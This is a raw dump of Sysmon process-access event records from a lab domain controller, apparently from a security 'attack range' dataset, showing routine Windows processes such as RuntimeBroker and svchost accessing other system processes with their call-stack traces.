13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c63|C:\Windows\System32\Windows.Storage.dll+e73d5|C:\Windows\System32\Windows.Storage.dll+e72e9|C:\Windows\System32\Windows.Storage.dll+e7282|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12ac55|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac29|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Wi